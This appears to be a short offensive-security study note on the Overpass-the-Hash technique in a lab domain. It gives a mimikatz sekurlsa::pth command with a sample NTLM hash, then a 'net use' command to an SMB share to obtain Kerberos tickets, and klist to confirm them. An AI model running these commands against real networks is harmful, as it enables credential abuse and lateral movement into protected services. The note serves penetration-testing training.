Overpass-the-Hash
The goal is to use a NTLM hash to get a TGT. Once we have a TGT, we can access all kerberos protected services that we couldn't access with only our NTLM hash.
Inside mimikatz:
> sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershellThis spawns a powershell session.
From this session we can for example trigger authentication to a smb share.
net use \\files04This should have generated a TGT and a TGS! We can see it with:
klistNow we can access the kerberos services.
Last updated